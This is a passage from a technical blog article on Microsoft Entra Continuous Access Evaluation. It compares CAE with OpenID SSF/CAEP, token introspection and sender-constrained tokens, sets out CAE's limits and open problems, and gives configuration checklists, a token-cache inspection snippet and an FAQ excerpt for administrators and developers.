&lt;p&gt;The default access-token lifetime for CAE-aware sessions is up to 28 hours; the default for non-CAE-capable clients remains 1 hour [@ms-cae-concept; @ms-cae-app-resilience]. Client support requires a current Microsoft Authentication Library (MSAL) release on the target platform: the 4.x line for .NET and JavaScript; the appropriate current line for Python, Java, Android, iOS, or macOS, per each SDK&apos;s own release stream. Microsoft Learn&apos;s &lt;em&gt;Use Continuous Access Evaluation enabled APIs&lt;/em&gt; page enumerates per-SDK guidance [@ms-cae-app-resilience]. The app registration must also declare the &lt;code&gt;xms_cc&lt;/code&gt; client capability with value &lt;code&gt;[&quot;cp1&quot;]&lt;/code&gt; to advertise CAE-handling support to the IdP [@ms-cae-app-resilience].&lt;/p&gt;

An app-registration claim by which a client advertises support for CAE-aware token issuance. The canonical wire-level value in the issued JWT is lowercase `&quot;cp1&quot;` (Microsoft&apos;s developer docs show both `&quot;cp1&quot;` and `&quot;CP1&quot;`; negotiation is case-insensitive but the token claim is lowercase). It signals that the client&apos;s MSAL implementation can decode and act on a `WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;` response by parsing the `claims` parameter and re-acquiring a token. Without it, Entra issues the default 1-hour token and the resource provider falls back to standard expiry [@ms-cae-app-resilience].

A Microsoft 365 workload (Exchange Online, SharePoint Online, Teams, or Microsoft Graph for Conditional Access policy) that consumes Entra&apos;s critical-event notifications and enforces them on subsequent token-bearing requests via the claims-challenge handshake. This is a narrower meaning than the generic OAuth 2.0 sense of &quot;resource server&quot;; in CAE, &quot;resource provider&quot; specifically means a workload that has implemented the CAE participation contract with Entra [@ms-cae-concept].

Microsoft documents an *upper bound* on token lifetime. The actual lifetime issued for any given session is variable and can be shorter. CAE-aware sessions can also be refreshed silently as long as the channel signals nothing has changed. Practically, this means most users with CAE-aware clients on M365 productivity workloads almost never see an interactive re-authentication prompt during normal working hours [@ms-cae-concept].
&lt;h3&gt;A migration note for older tenants&lt;/h3&gt;
&lt;p&gt;Tenant administrators with Conditional Access policies that pre-date GA may carry legacy &quot;strict location enforcement&quot; preview settings. Microsoft has since migrated the feature into GA, and the current Microsoft Learn page &lt;em&gt;Strictly enforce location policies using continuous access evaluation&lt;/em&gt; documents the post-migration configuration model [@ms-strict-location-enforcement]. Administrators should verify their policies after each major Conditional Access feature wave to ensure preview-to-GA migrations have been picked up.&lt;/p&gt;
&lt;p&gt;CAE is one approach among several. Where does it sit relative to introspection-per-request, identity-aware proxies, DPoP, and the cross-vendor OpenID standard? The design space is small enough to map cleanly.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches and Their Relation to CAE&lt;/h2&gt;
&lt;p&gt;Five named methods occupy adjacent positions in the design space. Some compete; some compose. The map matters because deployments that confuse the two get wrong answers.&lt;/p&gt;
&lt;h3&gt;CAE versus OpenID SSF and CAEP 1.0&lt;/h3&gt;
&lt;p&gt;Same architecture, different implementations. Microsoft CAE solves the Microsoft estate via a Microsoft-internal protocol; OpenID SSF and CAEP solve the cross-vendor SaaS long tail via a public standard atop RFC 8417 [@openid-three-final-specs; @openid-ssf-1_0-final; @openid-caep-1_0]. The two are convergent rather than rivalrous: Microsoft is moving toward also acting as an SSF transmitter and receiver alongside its first-party CAE protocol, and other vendors are building SSF receivers that can consume signals from any transmitter, including Microsoft.&lt;/p&gt;
&lt;p&gt;The Authenticate 2025 interop event in October 2025 was the first whose tested text was the Final-Specification version of SSF [@openid-authenticate-2025-interop]. Multi-vendor SSF and CAEP interoperability has been demonstrated at successive Gartner IAM Summit interop events as well. At the March 2024 London summit, SGNL&apos;s CAEP Hub interoperated as both transmitter and receiver with Cisco Duo, Okta, SailPoint, and Helisoft on the &lt;code&gt;session-revoked&lt;/code&gt; CAEP event [@sgnl-2024-04-interop]. Okta&apos;s own blog characterizes the March 2025 London summit as &quot;a significant industry shift toward interconnected, real-time security&quot; with &quot;interoperable implementations from pioneers like Okta, Google, IBM, Omnissa, SailPoint, and Thales&quot; [@okta-shared-signals].&lt;/p&gt;
&lt;p&gt;Tim Cappalli, who joined Okta after his time at Microsoft, co-chairs the OpenID Shared Signals Working Group alongside Atul Tulshibagwale (SGNL, formerly Google) [@tulshibagwale-sgnl-2023-08-qanda; @openid-sharedsignals-wg]. The cross-vendor co-chair arrangement is part of why the Final Specifications passed without significant vendor pushback: the people doing the standardization had visibility into both Microsoft&apos;s and Google&apos;s prior implementations.&lt;/p&gt;
&lt;h3&gt;CAE versus RFC 7662 introspection&lt;/h3&gt;
&lt;p&gt;Parallel paths, not competitors. RFC 7662 introspection [@rfc-7662] continues to be the right answer for opaque-token systems and on-premises IdPs where the AS-to-RP per-request round-trip is acceptable. CAE wins at hyperscale public-cloud volumes specifically because it inverts the per-request dependency: state pushes to the RP once and lives in cache; the data plane does not consult the AS on every request. If you are building a B2B integration with a small RP count and a few hundred requests per second, RFC 7662 is fine. If you are building Exchange Online, it is not.&lt;/p&gt;
&lt;h3&gt;CAE versus DPoP and mTLS-bound tokens&lt;/h3&gt;
&lt;p&gt;Complementary, not competitive. The threat model for CAE is &lt;em&gt;stale authorization&lt;/em&gt;: the authorization decision at sign-in is no longer accurate, because the user has been disabled, their password has been reset, their risk score has changed, or their network location has shifted. The threat model for proof-of-possession is &lt;em&gt;stolen tokens&lt;/em&gt;: an attacker holding a bearer token that was legitimately issued to a different party.&lt;/p&gt;
&lt;p&gt;RFC 9449, &lt;em&gt;OAuth 2.0 Demonstrating Proof of Possession (DPoP)&lt;/em&gt;, published September 2023 by Daniel Fett and collaborators [@rfc-9449-dpop], binds an access token to a client-held key pair: a DPoP-bound token can only be replayed by an attacker who also stole the private key. RFC 8705, &lt;em&gt;OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens&lt;/em&gt;, published February 2020 by Brian Campbell and collaborators [@rfc-8705-mtls], does the same thing using mTLS certificates. Both are sender-constrained-token mechanisms; both close the bearer-token-replay attack surface.&lt;/p&gt;
&lt;p&gt;CAE does not address token theft. A stolen CAE-aware token is still usable by the attacker until the IdP or RP becomes aware of the compromise. A DPoP-bound CAE-aware token closes both gaps: the attacker cannot replay it, and even if they could, the channel can revoke it within minutes. The correct deployment pattern is to combine CAE with DPoP or mTLS-binding where the application threat model warrants both.&lt;/p&gt;
&lt;h3&gt;CAE versus BeyondCorp-style identity-aware proxies&lt;/h3&gt;
&lt;p&gt;Different architectural layer. Identity-aware proxies (Google IAP, Cloudflare Access, AWS Verified Access) sit &lt;em&gt;in front of&lt;/em&gt; the resource server and enforce policy at the proxy. They have full visibility into per-request state and can do instant revocation by terminating the connection at the proxy when policy changes. This is correct for proxy-fronted workloads but does not scale to the long tail of API surfaces that cannot or will not sit behind a proxy. CAE pushes the enforcement into the resource server itself, which is what lets it work for native cloud APIs and federated SaaS where the proxy model would not.&lt;/p&gt;
&lt;h3&gt;A note on PRT theft&lt;/h3&gt;
&lt;p&gt;CAE does not address attacks at the &lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;Primary Refresh Token (PRT)&lt;/a&gt; layer. The PRT is a long-lived refresh credential Windows uses to mint access tokens silently from a logged-in session. A stolen PRT can mint CAE-aware access tokens that are, from Entra&apos;s perspective, legitimately issued -- the attacker holds a credential the IdP still recognizes. CAE will only catch this if the user is revoked, the password is reset, or one of the other critical events fires &lt;em&gt;after&lt;/em&gt; the PRT theft. The Pass-the-PRT attack class therefore bypasses CAE entirely; defenses for that layer are out of scope here and are a separate engineering problem.&lt;/p&gt;
&lt;h3&gt;Mapping the design space&lt;/h3&gt;
&lt;p&gt;The table is the cleanest way to see who competes with whom and who composes with whom.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Solves&lt;/th&gt;
&lt;th&gt;Composes with CAE&lt;/th&gt;
&lt;th&gt;Competes with CAE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;OpenID SSF/CAEP 1.0&lt;/td&gt;
&lt;td&gt;Cross-vendor revocation&lt;/td&gt;
&lt;td&gt;Yes (CAE is a Microsoft implementation of the same pattern)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RFC 7662 introspection&lt;/td&gt;
&lt;td&gt;Opaque-token revocation at modest scale&lt;/td&gt;
&lt;td&gt;Parallel path&lt;/td&gt;
&lt;td&gt;At hyperscale only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DPoP (RFC 9449)&lt;/td&gt;
&lt;td&gt;Sender-constrained tokens&lt;/td&gt;
&lt;td&gt;Yes (compose for full coverage)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;mTLS-bound tokens (RFC 8705)&lt;/td&gt;
&lt;td&gt;Sender-constrained tokens&lt;/td&gt;
&lt;td&gt;Yes (compose for full coverage)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity-aware proxy&lt;/td&gt;
&lt;td&gt;Per-request policy at the proxy edge&lt;/td&gt;
&lt;td&gt;Composes for proxy-fronted workloads&lt;/td&gt;
&lt;td&gt;Different layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Short access-token lifetime&lt;/td&gt;
&lt;td&gt;Reduces revocation window mechanically&lt;/td&gt;
&lt;td&gt;Falls back when CAE not available&lt;/td&gt;
&lt;td&gt;Yes, and loses on the trade&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The reader who came to this article expecting a binary contest -- &quot;which one wins?&quot; -- has the wrong frame. The actual answer is that CAE is one move in a layered defense, and most production deployments will end up composing it with DPoP or mTLS for token binding, falling back to short lifetimes for non-CAE clients, and continuing to use introspection for opaque-token internal APIs.&lt;/p&gt;
&lt;p&gt;That handles deployment. But every architecture has limits. The reader has spent six sections climbing; the next section is the &lt;em&gt;humility&lt;/em&gt; beat where the descent begins.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: What CAE Cannot Do&lt;/h2&gt;
&lt;p&gt;Every architecture has a floor. The reader has spent six sections climbing; this is where the limits show up -- not as vendor laziness, but as physics, scale, and trust topology.&lt;/p&gt;
&lt;h3&gt;Limit 1: cannot revoke a token already in flight&lt;/h3&gt;
&lt;p&gt;Once a request has been accepted and is being served by the resource provider, CAE cannot reach into the RP&apos;s execution thread and abort it. The revocation applies to the &lt;em&gt;next&lt;/em&gt; request. A long-running operation -- a bulk Outlook export, a large SharePoint upload -- that began at 10:23:00 may complete normally even if the user is disabled at 10:23:01. The revocation takes effect the next time the client presents the token [@ms-cae-concept]. For most use cases the in-flight window is sub-second and the consequence is negligible; for long-running data egress, it matters.&lt;/p&gt;
&lt;h3&gt;Limit 2: cannot beat the 15-minute critical-event SLA for most events&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s published SLA is &quot;up to 15 minutes&quot; for critical-event propagation [@ms-cae-concept]. Only IP-location enforcement is instant. The 15-minute number is not a fundamental limit; it is engineering economics at hyperscale. Fanning out an event to every CAE-aware RP for every potentially affected subject across Microsoft 365&apos;s global infrastructure is what produces the budget. Smaller-scale deployments demonstrate much better numbers: TigerIdentity&apos;s commercial deployment self-reports sub-second end-to-end revocation in a tuned CAEP receiver configuration [@tigeridentity-caep-explained]. The architecture allows sub-second; Microsoft&apos;s particular deployment chooses 15 minutes because the alternative at its fan-out scale is prohibitively expensive.&lt;/p&gt;
&lt;p&gt;The strict physical floor sits below even the tuned implementations. An RP cannot enforce a revocation it has not yet learned about. The one-way network latency $L$ between IdP and RP sets the absolute minimum: with a transcontinental $L \approx 70,\text{ms}$, no push protocol can revoke faster than that, and pull protocols are necessarily worse. In practice, queuing, scheduling, and event-fanout dominate $L$ at scale -- but the floor remains.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The 15-minute SLA is not a fundamental limit; it is engineering economics at hyperscale. Sub-second is feasible at smaller fan-outs, and is the direction of travel as receiver implementations improve and as Microsoft&apos;s own event-distribution infrastructure ages well. But the strict physical floor is the network latency between IdP and RP; no cooperative protocol can do better than that.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Limit 3: cannot cover non-CAE-aware clients or resource providers&lt;/h3&gt;
&lt;p&gt;CAE is a cooperative protocol. Both the client (via the &lt;code&gt;xms_cc=cp1&lt;/code&gt; capability declaration) and the resource provider (via implementing the participation contract) must be CAE-aware [@ms-cae-app-resilience]. A non-CAE client receives a default 1-hour token and never sees a claims challenge; it relies on standard expiry. A non-CAE RP silently falls back to standard token expiry as well; the IdP&apos;s events have no consumer. The CAE-aware portion of the estate enjoys the new contract; the rest carries the old security debt unchanged.&lt;/p&gt;
&lt;p&gt;This is why audit posture matters. A tenant administrator who wants to argue that revocation latency for their workforce is &quot;under 15 minutes&quot; must be able to demonstrate that the client and RP combinations the workforce actually uses are CAE-aware. Microsoft&apos;s compatibility tables [@ms-cae-concept] document several Office-web-app and OneDrive-Win32-versus-SharePoint combinations as &lt;em&gt;Not Supported&lt;/em&gt; or &lt;em&gt;Partially supported&lt;/em&gt;; those gaps are part of the tenant&apos;s effective revocation profile, not someone else&apos;s problem.&lt;/p&gt;
&lt;h3&gt;Limit 4: cannot help if the resource provider itself is compromised&lt;/h3&gt;
&lt;p&gt;Revocation state lives at the RP. A compromised RP can simply ignore revocation events: keep serving requests against tokens Entra has signaled are invalid; misreport its own subscription state; drop events on the floor. CAE is a &lt;em&gt;cooperative&lt;/em&gt; protocol between trustworthy parties. It is not a defense against an RP that has been pwned. The OpenID SSF specification addresses this implicitly by defining receiver requirements (verification events, stream-control endpoints, signature verification on SETs), but no receiver requirement can compel a compromised receiver to obey the protocol.&lt;/p&gt;
&lt;p&gt;The threat model implication: an attacker who has compromised an RP does not need to bypass CAE. They simply do not implement it from the inside, and the protocol&apos;s design has no remedy. RP integrity is a prerequisite, not a guarantee.&lt;/p&gt;
&lt;h3&gt;Limit 5: cannot revoke a stolen PRT before it mints a new access token&lt;/h3&gt;
&lt;p&gt;As noted in Section 7, the Primary Refresh Token sits outside CAE&apos;s scope. A stolen PRT mints new CAE-aware access tokens that Entra treats as legitimately issued, because from Entra&apos;s perspective they &lt;em&gt;are&lt;/em&gt; legitimately issued -- the attacker is presenting a credential the IdP recognizes. CAE catches PRT theft only when one of the five critical events fires after the theft. If the attacker exfiltrates a PRT, refreshes a token, and immediately uses it, the access token is valid and the revocation channel has nothing to revoke.&lt;/p&gt;
&lt;p&gt;The SharePoint Online user-risk-event caveat is a useful concrete example of the per-feature limit pattern. Even within the four CAE-consuming RPs, feature support is not uniform; you cannot reason about CAE as a single boolean property at the workload level. Every event you care about must be checked against the specific RP that will enforce it [@ms-cae-concept].&lt;/p&gt;
&lt;h3&gt;The bounded design space&lt;/h3&gt;
&lt;p&gt;Put together, the five limits draw the perimeter of what CAE can do. It cannot stop in-flight requests. It cannot beat network latency at the strict floor or 15 minutes at Microsoft&apos;s chosen operating point. It cannot help non-participating clients or RPs. It cannot fix a compromised RP. It cannot revoke PRT-layer credentials before they mint new tokens. The honest summary is that the design space is &lt;em&gt;bounded&lt;/em&gt; -- the reader who internalizes the five limits has a calibrated sense of what is fundamentally possible, and can stop expecting CAE to be a single fix for revocation in all situations.&lt;/p&gt;
&lt;p&gt;The limits also map the open frontier. If those are the structural constraints, what are the OpenID Foundation and the SaaS long tail working on in 2026?&lt;/p&gt;
&lt;h2&gt;9. Open Problems (2026)&lt;/h2&gt;
&lt;p&gt;Final Specifications are necessary but not sufficient. CAEP 1.0, SSF 1.0, and RISC 1.0 were approved on September 2, 2025 [@openid-three-final-specs]. The question for 2026 is what &lt;em&gt;adoption&lt;/em&gt; and &lt;em&gt;extension&lt;/em&gt; look like. Five live problems.&lt;/p&gt;
&lt;h3&gt;1. Third-party SaaS receiver-adoption depth&lt;/h3&gt;
&lt;p&gt;The Final Specifications give every SaaS vendor a clean target to build against. The question is whether they will. Google Workspace shipped its SSF receiver in Closed Beta, supporting only the &lt;code&gt;session-revoked&lt;/code&gt; CAEP event at launch [@google-workspace-ssf-api]. That is one event out of CAEP 1.0&apos;s eight. The SaaS long tail -- Workday, ServiceNow, GitHub Enterprise, Atlassian, Salesforce -- has not, as of the Final Specification&apos;s first anniversary, shipped public receivers.&lt;/p&gt;
&lt;p&gt;For the &quot;fired employee with N SaaS apps&quot; scenario to be fully solved, every SaaS app in the user&apos;s bundle has to be a CAEP receiver subscribed to events from the enterprise IdP. The architecture is in place; the integration work is per-vendor and per-customer. This is the largest single determinant of CAE&apos;s real-world value over the next several years.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Microsoft 365 estate enjoys near-complete CAE coverage because Microsoft built both the IdP and the resource providers. The cross-vendor story is fundamentally a coordination problem: every receiver has to be built, deployed, and configured to subscribe to events from every transmitter the enterprise uses. SSF 1.0 makes the integration tractable; it does not make the work disappear. Watch receiver coverage in 2026-2028 as the leading indicator of CAE&apos;s industry-wide impact.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;2. CAE for non-human and agent identities&lt;/h3&gt;
&lt;p&gt;CAEP subject identifiers assume user-shaped or device-shaped subjects [@openid-caep-1_0]. Workload identities, service principals, and emerging &lt;a href=&quot;https://paragmali.com/blog/agentic-identity-on-windows-when-the-process-acting-on-your-/&quot; rel=&quot;noopener&quot;&gt;AI-agent identities&lt;/a&gt; sit outside the model as currently profiled. An agent acting on behalf of a user, with its own identity and its own session, is not yet covered by a Final-Specification profile. The Microsoft Entra &lt;em&gt;Conditional Access for Agent Identities&lt;/em&gt; workstream is a documented Microsoft Learn surface as of 2026 [@ms-conditional-access-agent-id] and is one of the workstreams that will eventually produce a CAEP profile for non-human subjects, but as of mid-2026 the cross-vendor standardization gap is open.&lt;/p&gt;
&lt;h3&gt;3. Cross-IdP federation of SSF streams&lt;/h3&gt;
&lt;p&gt;When tenant A federates to tenant B, the event-flow path crosses a trust boundary the current Final Specifications do not explicitly profile. If a user is disabled in tenant A&apos;s IdP, how does the revocation event reach the resource providers downstream in tenant B? The pieces -- transmitter, receiver, SET envelope, signed events -- are all in place; what is missing is the canonical profile for cross-IdP federation of SSF streams. This is a 2026-2027 OpenID Foundation workstream rather than a Final-Specification gap.&lt;/p&gt;
&lt;h3&gt;4. Bidirectional signal sharing&lt;/h3&gt;
&lt;p&gt;Today&apos;s CAE and CAEP deployments are largely IdP-as-transmitter, RP-as-receiver. The full vision is bidirectional: an RP that detects anomalous behavior (unusual access patterns, suspected automation, post-authentication risk signals) should be able to transmit those signals back to the IdP, which can then incorporate them into the next authorization decision. SGNL and similar vendors are building toward this model. The Final Specifications support bidirectional flow at the protocol level; the policy and operational pieces -- who trusts whom, what events flow which way, how an IdP weighs signals from an RP -- are still being worked out.&lt;/p&gt;
&lt;h3&gt;5. Reason-code convergence between CAEP and RISC&lt;/h3&gt;
&lt;p&gt;CAEP 1.0 and RISC 1.0 cover overlapping ground around credential mutation. CAEP defines a &lt;code&gt;credential-change&lt;/code&gt; event; RISC defines &lt;code&gt;account-credential-change-required&lt;/code&gt; [@openid-caep-1_0; @openid-sharedsignals-wg]. Implementers must choose, and vendor extensions proliferate where the spec leaves room. Reason-code convergence between the two profiles is incomplete; some receivers will subscribe to both streams to be safe, others will pick one and hope upstream transmitters agree. Over time the WG will likely consolidate; for 2026, the practical guidance is to support both event vocabularies in receiver code.&lt;/p&gt;

The first interoperability event whose tested text was the Final-Specification version of SSF took place at Authenticate 2025 in Carlsbad, California, October 13-15, 2025, hosted by the FIDO Alliance and coordinated by the OpenID Foundation Shared Signals Working Group [@openid-authenticate-2025-interop]. The event required that all participants with an SSF Transmitter pass the OpenID Foundation&apos;s free, open-source conformance tests. This was the fourth in a series of Gartner-IAM and Authenticate interops since March 2024, and the first conducted after SSF 1.0 was approved Final on September 2, 2025. The list of vendor participants has grown at each event; cross-vendor receiver coverage is the metric to watch.
&lt;p&gt;Given all this -- the architecture, the limits, the open frontier -- what should you actually do this week in your tenant and your code?&lt;/p&gt;
&lt;h2&gt;10. Turning CAE On in Your Tenant and Your Code&lt;/h2&gt;
&lt;p&gt;Three audiences, three checklists. Each section is what an engineer in that role needs to confirm or change to make CAE work in their environment.&lt;/p&gt;
&lt;h3&gt;For the tenant administrator&lt;/h3&gt;
&lt;p&gt;CAE has been auto-enabled by default for new Microsoft Entra tenants since the January 2022 GA [@simons-2022-01-ga-rss]. Tenants created before then may need to verify enablement in &lt;strong&gt;Conditional Access -&amp;gt; Session controls -&amp;gt; Customize continuous access evaluation&lt;/strong&gt;. The relevant signals to check:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;CAE enablement state.&lt;/strong&gt; Confirm that the tenant-wide CAE policy is set to &lt;em&gt;Enabled&lt;/em&gt; rather than &lt;em&gt;Disabled&lt;/em&gt; or &lt;em&gt;Strict location&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Per-policy disable flags.&lt;/strong&gt; Some legacy CA policies carry per-policy CAE overrides. Audit any that explicitly disable CAE; the right default is to honor it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Strict location enforcement migration.&lt;/strong&gt; Tenants with pre-GA &quot;strict location enforcement&quot; preview settings should verify that the policy has migrated to the current GA configuration model documented in Microsoft Learn [@ms-strict-location-enforcement].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Audit log baselines.&lt;/strong&gt; Sign-in logs surface &lt;code&gt;signInEventTypes&lt;/code&gt; with CAE-related entries; refresh-token issuance events and revocation events appear in the Entra ID audit log. Build a baseline before changing policies so you can detect drift.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;For the MSAL client developer&lt;/h3&gt;
&lt;p&gt;The client side has three things to confirm and one thing to test:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;MSAL version.&lt;/strong&gt; Use a current MSAL release on your client platform: 4.x for MSAL.NET and MSAL.js; the appropriate current line for MSAL Python, MSAL Java, MSAL Android, and MSAL for iOS/macOS, per each SDK&apos;s own release stream. Microsoft Learn&apos;s &lt;em&gt;Use Continuous Access Evaluation enabled APIs&lt;/em&gt; page enumerates the per-SDK guidance [@ms-cae-app-resilience]. Earlier major-version lines do not handle the claims challenge transparently.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Capability declaration.&lt;/strong&gt; The app registration must declare &lt;code&gt;xms_cc&lt;/code&gt; with value &lt;code&gt;[&quot;cp1&quot;]&lt;/code&gt; (lowercase is the canonical token-claim form; uppercase &lt;code&gt;&quot;CP1&quot;&lt;/code&gt; also works because negotiation is case-insensitive). This is the wire-level signal to Entra that the client can handle a CAE-aware token and the claims challenge that comes with it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Claims-challenge handling.&lt;/strong&gt; MSAL helpers do this transparently in current SDK versions, but custom HTTP pipelines that bypass MSAL must implement the &lt;code&gt;WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;&lt;/code&gt; response handler manually. Decode the &lt;code&gt;claims&lt;/code&gt; parameter (base64url), pass it to &lt;code&gt;AcquireTokenInteractive&lt;/code&gt; or the equivalent, retry the original request with the new token.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;End-to-end test.&lt;/strong&gt; Trigger an admin password reset against a test user in a non-production tenant and verify that the next API call from a signed-in MSAL session surfaces the claims challenge and recovers cleanly. This is the single most useful confidence test; it exercises every layer of the protocol in one round trip.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;{`
// Illustrative: inspect an MSAL JS token-cache entry for the xms_cc capability
// marker. In real apps, MSAL handles capability negotiation; this is for
// educational inspection only.&lt;/p&gt;
&lt;p&gt;// A real-shape AccessTokenEntity from MSAL JS cache
const tokenEntity = {
  homeAccountId: &apos;abc.def-tenant&apos;,
  environment: &apos;login.microsoftonline.com&apos;,
  credentialType: &apos;AccessToken&apos;,
  clientId: &apos;11111111-2222-3333-4444-555555555555&apos;,
  tenantId: &apos;tenant-id&apos;,
  target: &apos;User.Read Mail.Read&apos;,
  // expiresOn is up to ~28 hours after cachedAt for CAE-aware sessions
  cachedAt: &apos;1748534400&apos;,
  expiresOn: &apos;1748635200&apos;,  // 28h later
  extendedExpiresOn: &apos;1748635200&apos;,
  // Capability declaration the app advertised at acquisition time
  requestedClaims: { xms_cc: [&apos;cp1&apos;] }
};&lt;/p&gt;
&lt;p&gt;const ttlSeconds = parseInt(tokenEntity.expiresOn) - parseInt(tokenEntity.cachedAt);
const ttlHours = ttlSeconds / 3600;
const isCaeAware = tokenEntity.requestedClaims &amp;amp;&amp;amp;
                   tokenEntity.requestedClaims.xms_cc &amp;amp;&amp;amp;
                   tokenEntity.requestedClaims.xms_cc
                     .some(c =&amp;gt; c.toLowerCase() === &apos;cp1&apos;);&lt;/p&gt;
&lt;p&gt;console.log(&apos;TTL hours:&apos;, ttlHours.toFixed(1));
console.log(&apos;CAE-aware:&apos;, isCaeAware);
// TTL hours: 28.0
// CAE-aware: true
// A TTL above ~1 hour with xms_cc cp1 is a strong indicator the session is
// CAE-aware and Entra issued an extended-lifetime token.
`}&lt;/p&gt;
&lt;h3&gt;For the custom-API author&lt;/h3&gt;
&lt;p&gt;This is the hardest path. To make a custom protected API a CAE-aware resource provider today, the first-party Microsoft pathway is not publicly available -- the CAE participation contract for the M365 productivity workloads is internal to Microsoft. The community-canonical implementation pattern is Damien Bowden&apos;s &lt;code&gt;damienbod/AspNetCoreMeIDCAE&lt;/code&gt; reference repository on GitHub [@damienbod-aspnetcoremeidcae], with an accompanying blog post walkthrough [@damienbod-blog-2022-04]. The repository (initial version April 3, 2022; updated through .NET 10 in late 2025) demonstrates:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;xms_cc=cp1&lt;/code&gt; capability declaration on both the client and the API app registrations.&lt;/li&gt;
&lt;li&gt;The Microsoft.Identity.Web claims-challenge handling on the API side.&lt;/li&gt;
&lt;li&gt;The Razor Page client flow that catches a &lt;code&gt;401&lt;/code&gt; with the challenge header and re-acquires the token.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a fully standards-track pathway, the same custom API can be built as an OpenID SSF receiver consuming CAEP events from any SSF-compliant transmitter, using the RFC 8417 SET envelope over the RFC 8935 push transport [@rfc-8417; @rfc-8935]. Production-grade SSF receiver code is now available in commercial CAEP Hub products (SGNL, TigerIdentity) and a growing set of open-source libraries.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CAE itself does not require add-on licensing for the basic critical-event evaluation across Microsoft 365 -- it is part of the Entra ID baseline for new tenants. The Microsoft Entra ID Protection feed that drives &lt;em&gt;high user risk detected&lt;/em&gt; events, however, requires Microsoft Entra ID P2 (or an equivalent SKU that includes Identity Protection). Confirm current licensing terms in the Microsoft licensing documentation before making procurement decisions; the lower SKUs cover four of the five critical events but not the risk-based one [@ms-cae-concept].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Observability&lt;/h3&gt;
&lt;p&gt;Sign-in logs and audit logs are where CAE behavior shows up. Look for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sign-in logs&lt;/strong&gt;: filter by &lt;code&gt;signInEventTypes&lt;/code&gt; containing CAE-related entries. CAE-aware sign-ins have a different telemetry shape than non-CAE sign-ins.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Token-issuance events&lt;/strong&gt;: refresh-token issuance against CAE-aware app registrations should show the extended lifetime.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Audit log revocation entries&lt;/strong&gt;: administrator revocation actions and Identity-Protection-driven revocations appear here; cross-correlate with the resource-provider-side telemetry to validate end-to-end propagation.&lt;/li&gt;
&lt;/ul&gt;

Use Microsoft Graph PowerShell to enumerate the tenant&apos;s CAE configuration and then trigger a synthetic test: 1) read `Get-MgIdentityConditionalAccessPolicy` to verify the relevant CA policies have CAE enabled in their `SessionControls.ContinuousAccessEvaluation` block; 2) create a test user, sign them in via Outlook on the Web; 3) reset their password via `Update-MgUser`; 4) observe in the audit log that the password reset propagates to a CAE event, and verify in Outlook on the Web that the next refresh surfaces a re-authentication prompt within the 15-minute SLA. This is the simplest end-to-end confidence test that does not require modifying any production resource.
&lt;h3&gt;Defaults are good&lt;/h3&gt;
&lt;p&gt;The most common engineering recommendation here is to leave the defaults alone. CAE on, default tenant settings, current MSAL clients, &lt;code&gt;xms_cc=cp1&lt;/code&gt; on every new app registration. The configuration surface area is small precisely because the design is right: there are not many knobs to turn. The work is in confirming that the client and RP combinations your users actually exercise are CAE-aware, and in monitoring the audit logs to catch drift.&lt;/p&gt;
&lt;p&gt;That is what to do. The last section is what to remember -- the misconceptions every team carries into a CAE conversation, and the answers that close them.&lt;/p&gt;
&lt;h2&gt;11. FAQ and Coda&lt;/h2&gt;

No. The published SLA is up to 15 minutes for the five critical events; only IP-location enforcement is instant. See Section 6 for the mechanical reason for the asymmetry and Section 8 Limit 2 for why 15 minutes is engineering economics rather than a fundamental limit [@ms-cae-concept].

